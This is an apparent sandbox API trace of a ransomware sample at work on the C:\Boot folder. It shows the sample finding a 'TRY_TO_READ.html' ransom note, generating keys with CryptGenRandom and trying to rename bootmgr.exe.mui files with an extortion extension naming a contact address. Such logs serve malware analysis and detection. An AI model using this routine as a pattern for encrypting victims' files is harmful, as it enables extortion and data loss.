	[0051.983] FindNextFileW (in: hFindFile=0x5751e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.983] GetLastError () returned 0x6
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5260
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.983] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.983] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.984] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5260 | out: hHeap=0x540000) returned 1
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.984] FindNextFileW (in: hFindFile=0x5751e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.984] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.984] GetLastError () returned 0x6
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.984] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.984] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.984] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.984] FindNextFileW (in: hFindFile=0x5751e0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b1218
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965b0
	[0051.984] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b1218 | out: pbBuffer=0x5b1218) returned 1
	[0051.984] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5965b0 | out: pbBuffer=0x5965b0) returned 1
	[0051.984] SetFileAttributesW (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0051.984] lstrlenW (lpString="C:\\\\Boot\\de-DE\\bootmgr.exe.mui") returned 30
	[0051.984] GetProcessHeap () returned 0x540000
	[0051.984] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0051.984] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui") returned="C:\\\\Boot\\de-DE\\bootmgr.exe.mui"
	[0051.984] lstrcatW (in: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.984] MoveFileExW (lpExistingFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.984] CreateFileW (lpFileName="C:\\\\Boot\\de-DE\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.984] GetProcessHeap () returned 0x540000
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.985] CloseHandle (hObject=0xffffffff) returned 0
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a52b0 | out: hHeap=0x540000) returned 1
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a52d8 | out: hHeap=0x540000) returned 1
	[0051.985] FindFirstFileW (in: lpFileName="C:\\\\Boot\\el-GR\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575220
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.985] GetLastError () returned 0x6
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a52b0
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575260
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575260 | out: hHeap=0x540000) returned 1
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a52b0 | out: hHeap=0x540000) returned 1
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.985] FindNextFileW (in: hFindFile=0x575220, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.985] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.985] GetLastError () returned 0x6
	[0051.985] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a52b0
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575260
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575260 | out: hHeap=0x540000) returned 1
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a52b0 | out: hHeap=0x540000) returned 1
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.986] FindNextFileW (in: hFindFile=0x575220, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.986] GetLastError () returned 0x6
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a52b0
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a52b0 | out: hHeap=0x540000) returned 1
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.986] FindNextFileW (in: hFindFile=0x575220, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.986] GetLastError () returned 0x6
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.986] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.986] FindNextFileW (in: hFindFile=0x575220, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b2328
	[0051.986] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5965c0
	[0051.986] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b2328 | out: pbBuffer=0x5b2328) returned 1
	[0051.987] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5965c0 | out: pbBuffer=0x5965c0) returned 1
	[0051.987] SetFileAttributesW (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0
	[0051.987] lstrlenW (lpString="C:\\\\Boot\\el-GR\\bootmgr.exe.mui") returned 30
	[0051.987] GetProcessHeap () returned 0x540000
	[0051.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa2) returned 0x5919d0
	[0051.987] lstrcpyW (in: lpString1=0x5919d0, lpString2="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" | out: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui") returned="C:\\\\Boot\\el-GR\\bootmgr.exe.mui"
	[0051.987] lstrcatW (in: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR"
	[0051.987] MoveFileExW (lpExistingFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0051.987] CreateFileW (lpFileName="C:\\\\Boot\\el-GR\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0051.987] GetProcessHeap () returned 0x540000
	[0051.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5919d0 | out: hHeap=0x540000) returned 1
	[0051.987] CloseHandle (hObject=0xffffffff) returned 0
	[0051.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.987] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5300 | out: hHeap=0x540000) returned 1
	[0051.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5328 | out: hHeap=0x540000) returned 1
	[0051.987] FindFirstFileW (in: lpFileName="C:\\\\Boot\\en-US\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575260
	[0051.987] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.988] GetLastError () returned 0x6
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5300
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5752a0
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5752a0 | out: hHeap=0x540000) returned 1
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5300 | out: hHeap=0x540000) returned 1
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.988] FindNextFileW (in: hFindFile=0x575260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.988] GetLastError () returned 0x6
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5300
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x5752a0
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5752a0 | out: hHeap=0x540000) returned 1
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5300 | out: hHeap=0x540000) returned 1
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.988] FindNextFileW (in: hFindFile=0x575260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1
	[0051.988] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.988] GetLastError () returned 0x6
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5300
	[0051.988] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5300 | out: hHeap=0x540000) returned 1
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.989] FindNextFileW (in: hFindFile=0x575260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.989] GetLastError () returned 0x6
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a5300
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5300 | out: hHeap=0x540000) returned 1
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.989] FindNextFileW (in: hFindFile=0x575260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.989] GetLastError () returned 0x6
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583ad8
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.989] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583ad8 | out: hHeap=0x540000) returned 1
	[0051.989] FindNextFileW (in: hFindFile=0x575260, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c64330, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.989] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b3438
